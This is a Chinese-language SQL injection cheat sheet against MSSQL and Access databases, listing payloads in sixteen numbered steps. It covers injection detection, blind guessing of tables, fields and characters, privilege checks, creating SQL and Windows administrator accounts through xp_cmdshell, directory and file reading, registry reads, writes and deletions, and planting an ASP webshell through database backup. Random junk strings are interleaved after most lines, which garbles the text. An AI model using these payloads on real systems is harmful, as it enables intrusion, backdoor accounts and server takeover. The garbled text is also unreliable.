1.判断是否有注入;and 1=1 ;and 1=2 lm&C!{K
2.初步判断是否是mssql ;and user>0 EVj48
#V8='qD
3.注入参数是字符'and [查询条件] and ''=' ^tuJM:
ANCgch\
4.搜索时没过滤参数的'and [查询条件] and '%25'=' {Pg7IYjH
7q|(ZZa
5.判断数据库系统 M{7EFTy!y
nu$LWC-
;and (select count(*) from sysobjects)>0 mssql `z3?ET
P
N_QK Z
;and (select count(*) from msysobjects)>0 access Y#6@0Nn[G
o\Hg2^YY>
T"Q4vk,3*J
j<+iL]b
6.猜数据库 ;and (select Count(*) from [数据库名])>0 .@APxeU
"MXd!
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ;8g#"p*&
Vb 4Qt#o
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ~pj9_I
SAG)vmm
9.(1)猜字段的ascii值(access) (>0d+ KT
?V[yw=sl04
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 z PV/{)S
oUw-l_ M]
(2)猜字段的ascii值(mssql) z6G^ BaT'
|<ke>j/6n
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
W{;!JI7;z
r+0)l:{.
10.测试权限结构(mssql) HXdPKS4q
O|j5ulO}&"
VUF7-C*
)hQNIt3o_
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- i%*x7zjY{
XE$eHx3;
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- e`$v\7K
~:)$~g7>b
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- :M3l#`4Q
o-O/M S
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- XtfL{Fy|T
'KQuz)-
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- g\(7z
P
VY _(0
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- hkU#
lt
C
[2tH2*#
;and 1=(select IS_MEMBER('db_owner'));-- wOi>i`D&
)X^nzhZ2O"
XY4s
#zy,x
11.添加mssql和系统的帐户 _-8,}F}W#s
g'Xl>q
;exec master.dbo.sp_addlogin username;-- c=
a+7>
;exec master.dbo.sp_password null,username,password;-- T>uLqd{hH
)cqhbR
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- )edM@beY_
}(tGjx]
;exec master.dbo.xp_cmdshell 'net user username password Wt3\&.n
6!"15dPN
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- N M8F
Z@ws,f^e
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?|hzAF"U
e#'`I^8l
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- KFV]2mFN
-~(0:@o ;
u8<=FV3
@6D<D6`
12.(1)遍历目录 9i`LOl:;
#^v5Eo
;create table dirs(paths varchar(100), id int) 3mJHk<m8T
;C"J5RA
;insert dirs exec master.dbo.xp_dirtree 'c:\' p-7dJ
v}_$9&|S
;and (select top 1 paths from dirs)>0 /BIPLDN6
If&p$pAH?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) C3_*o>8
{9l4 pT3
`\Npu
|M
K-~ep
(2)遍历目录 )@Zel.XD
"7<4NV@yQ
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- X&lkA
(
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ,!Hl@(
#SqOJX~Q
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 9xKFX|*$
f(_qcgXp
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 1Xs!ew)>
U50X`J
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 rzTyHK[
m|7g{vHVV
?B}>[
u51/B:+
13.mssql中的存储过程 h NoN=J
^Ue.9#9T&g
xp_regenumvalues 注册表根键, 子键 Ci*5E$+\
U=yD!
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 uo{QF5z]
=az$WRV+7!
xp_regread 根键,子键,键值名 aFSZYyPxwv
,f1wN{P
;exec xp_regread eP2 y U
{Y@[hoHtF
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 >'T%=50YH
;I7Z*'5!
xp_regwrite 根键,子键, 值名, 值类型, 值 GS,pl9#V_
vn_avYwiy
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @!MbPS
foFn`?LF
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 aH$~':[93
:qZ^<3+:
xp_regdeletevalue 根键,子键,值名 drZw#b
@fK`l@K
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 9BY b{<0tS
?)X@4Jem
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 *=Fcu@
}F.1j!71L
vP?yl "U
<Q0&[q;Z
14.mssql的backup创建webshell Yx%%+c?.
a@a1/3
use model /0c&!OP
_NkN3f5 1L
create table cmd(str image); 4J_%quxO
Rk=B;
insert into cmd(str) values (''); q38; w~H
)6j:Mbz
backup database model to disk='c:\l.asp'; +?<jSmGW
g\.N>P@Bu
v\ox:C
Gs6#aL}]R
15.mssql内置函数 r%#qbsN
~4^e a
;and (select @@version)>0 获得Windows的版本号 g3Q #B7A
'!I?C/49k
;and user_name()='dbo' 判断当前系统的连接用户是不是sa at*=#?M1?
xpxm9ySwu
;and (select user_name())>0 爆当前系统的连接用户 4
5lg&oO
9VByFQgM
;and (select db_name())>0 得到当前连接的数据库 :1=?/8h
c5;ROnTm
$>UzXhf}\
Jc)1}
16.简洁的webshell XJ\q!{;h
5Z[D(z
use model r &[~/m8zl
EyeLC6u
create table cmd(str image); T82_`u
YZ>cE#
insert into cmd(str) values (''); g)9/z
-0`hJ_(
backup database model to disk='g:\wwwtest\l.asp';